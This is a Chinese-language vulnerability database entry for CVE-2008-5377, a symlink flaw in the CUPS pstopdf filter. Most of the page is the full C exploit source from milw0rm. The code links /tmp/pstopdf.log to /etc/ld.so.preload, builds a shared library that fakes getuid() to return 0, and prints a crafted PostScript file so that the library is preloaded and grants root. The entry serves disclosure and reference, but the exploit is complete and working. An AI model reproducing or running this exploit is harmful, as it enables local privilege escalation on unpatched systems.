CUPS 'pstopdf' symlink攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117108 漏洞类型 后置链接
发布时间 2008-12-22 更新时间 2009-01-12
CVE编号 CVE-2008-5377 CNNVD-ID CNNVD-200812-101
漏洞平台 Multiple CVSS评分 6.9
|漏洞来源
https://www.exploit-db.com/exploits/7550
https://www.securityfocus.com/bid/32745
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-101
|漏洞详情
CommonUnixPrintingSystem(CUPS)是一款通用Unix打印系统,是Unix环境下的跨平台打印解决方案,基于Internet打印协议,提供大多数PostScript和raster打印机服务。CUPS1.3.8版本的pstopdf允许本地用户可以借助对/tmp/pstopdf.log临时文件的一个symlink攻击,重写任意文件。该漏洞不同于CVE-2001-1333。
|漏洞EXP
/*
 * cve-2008-5377.c
 *
 * CUPS < 1.3.8-4 pstopdf filter exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * 
 * Usage:
 *
 *   $ gcc cve-2008-5377.c -o cve-2008-5377.c
 *   $ ./cve-2008-5377
 *   $ id
 *   uid=0(root) gid=1000(vm) ...
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
 *
 *   pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
 *   a symlink attack on the /tmp/pstopdf.log temporary file.
 *
 * Operation:
 *
 *   The exploit creates and prints a malformed postscript document that will
 *   cause the CUPS pstopdf filter to write an error message out to its log 
 *   file that contains the string /tmp/getuid.so.  However, since we also 
 *   symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the 
 *   error message and malicious shared library path will be appended to the
 *   ld.so.preload file, allowing us to elevate privileges to root.
 *
 * Note:
 * 
 *   This exploit only works under the (rare) conditions that cupsd executes 
 *   external filters as a privileged user, a printer on the system uses the 
 *   pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
 *   must be world readable.
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

int
main(void)
{
	int ret;
	FILE *fp;
	struct stat log;

	fp = fopen("/tmp/cve-2008-5377.ps", "w");
	if(!fp) {
		printf("error: cannot open /tmp/cve-2008-5377.ps\n");
		goto cleanup;
	}
	fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
	fclose(fp);

	fp = fopen("/tmp/getuid.c", "w");
	if(!fp) {
		printf("error: cannot open /tmp/getuid.c\n");
		goto cleanup;
	}
	fprintf(fp, "int getuid(){return 0;}\n");
	fclose(fp);

	ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
	if (WEXITSTATUS(ret) != 0) {
		printf("error: cannot compile /tmp/getuid.c\n");
		goto cleanup;
	}

	unlink("/tmp/pstopdf.log");
	ret = stat("/tmp/pstopdf.log", &log);
	if (ret != -1) {
		
		printf("error: /tmp/pstopdf.log already exists\n");
		goto cleanup;
	}

	ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
	if (ret == -1) {
		printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
		goto cleanup;
	}

	ret = system("lp < /tmp/cve-2008-5377.ps");
	if (WEXITSTATUS(ret) != 0) {
		printf("error: could not print /tmp/cve-2008-5377.ps\n");
		goto cleanup;
	}

cleanup:
	unlink("/tmp/cve-2008-5377.ps");
	unlink("/tmp/getuid.c");
	return 0;
} 

// milw0rm.com [2008-12-22]
|受影响的产品
Ubuntu Ubuntu Linux 8.10 sparc Ubuntu Ubuntu Linux 8.10 powerpc Ubuntu Ubuntu Linux 8.10 lpia Ubuntu Ubuntu Linux 8.10 i386 Ubuntu Ubuntu Linux 8.10 amd64 Ubuntu Ubuntu L
|参考资料

来源:MILW0RM
名称:7550
链接:http://www.milw0rm.com/exploits/7550
来源:MISC
链接:http://uvw.ru/report.sid.txt
来源:MLIST
名称:[debian-devel]20080813Re:Possiblemassbugfiling:ThepossibilityofattackwiththehelpofsymlinksinsomeDebianpackages
链接:http://lists.debian.org/debian-devel/2008/08/msg00347.html